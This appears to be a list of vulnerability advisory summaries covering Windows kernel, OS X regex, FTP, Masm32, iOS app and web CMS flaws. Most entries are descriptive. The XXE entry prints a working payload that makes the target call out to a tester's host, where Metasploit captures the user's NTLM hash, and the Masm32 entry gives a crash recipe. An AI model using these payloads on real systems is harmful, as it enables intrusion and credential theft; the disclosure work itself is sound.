This vulnerability occurs when a user switches between two desktops, one of which has been closed. The test case crashes with and without special pool enabled. The attached crash output was captured with special pool enabled on win32k.sys and ntoskrnl.sys.
The attached PoC triggers a blue screen due to a use-after-free vulnerability. The PoC is a zip file containing a proof-of-concept exploit for a use-after-free vulnerability in the Bitmap object. The exploit allows an attacker to write to arbitrary addresses, which can be used to execute arbitrary code.
A buffer overflow vulnerability exists in OS X Libc when the regex engine is used in enhanced mode (by passing the REG_ENHANCED flag to regcomp). The code blindly copies hex characters from the regex into the 32-byte stack buffer tmp until it encounters either a non-hex character or a '}'. This can be exploited to crash the application by passing a long string of hex characters in the regex.
The OS X regex engine function tre_tnfa_run_parallel contains the following code:

    int tbytes;
    ...
    if (!match_tags)
      num_tags = 0;
    else
      num_tags = tnfa->num_tags;
    ...
    int rbytes, pbytes, total_bytes;
    char *tmp_buf;
    /* Compute the length of the block we need. */
    tbytes = sizeof(*tmp_tags) * num_tags;
    rbytes = sizeof(*reach_next) * (tnfa->num_states + 1);
    pbytes = sizeof(*reach_pos) * tnfa->num_states;
    total_bytes =
      (sizeof(long) - 1) * 4  /* for alignment paddings */
      + (rbytes + tbytes * tnfa->num_states) * 2
      + tbytes + pbytes;

num_states and num_tags are computed from the requirements of the regex, and it is quite easy to make each of them exceed 64k with a relatively small regex. Note that total_bytes is an int and part of its calculation is the product of num_states and num_tags. The types here are inconsistent, with conversions between int, unsigned and size_t. The attached PoC causes total_bytes to become negative, so that total_bytes is sign-extended in the memset call.
An XML External Entity (XXE) injection vulnerability has been found in the XML parser in the System Administration -> XML Content and Actions -> Import section. The example shows how a pentester is able to obtain the NTLM hash of the application's user. Content of the PoC file: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "file:////Tester.IP/test"> %remote; %param1; ]><root/> When the pentester has the Metasploit smb_capture module running, the application will contact the pentester's host and provide the NTLM hash of the user.
A directory traversal vulnerability exists in Konica Minolta FTP Utility, which allows an attacker to read arbitrary files on the vulnerable system. This is due to the application not properly validating user-supplied input, allowing an attacker to traverse the directory structure and read files outside of the intended directory. This vulnerability can be exploited by sending a specially crafted FTP request containing directory traversal characters (e.g. '../') to the vulnerable server.
A buffer overflow vulnerability exists in Masm32v11r which allows an attacker to crash the program by creating a file called MASM_crash.txt containing a buffer of 4676 A's, 4 B's, 4 C's and 500 D's, and then converting it to a script using the Quick Editor in Masm32.
An arbitrary file upload web vulnerability has been discovered in the official Air Drive Plus v2.4 iOS web application. The arbitrary file upload web vulnerability allows remote attackers, without authorization, to include local file/path requests or system-specific path commands to compromise the mobile web application.
h5ai is a popular web-based file indexer. Versions 0.22.0 - 0.24.1 are vulnerable to an unrestricted file upload vulnerability. An attacker can upload arbitrary files to the web server, which can lead to remote code execution.
KirbyCMS has a vulnerability that allows authentication bypass in a hosting environment where users within the same shared environment can save/read files in a directory accessible by both the victim and the attacker. During the login process, it fails to validate the resulting path to ensure that it does not contain path traversal sequences such as '../' within the login variable provided by a user.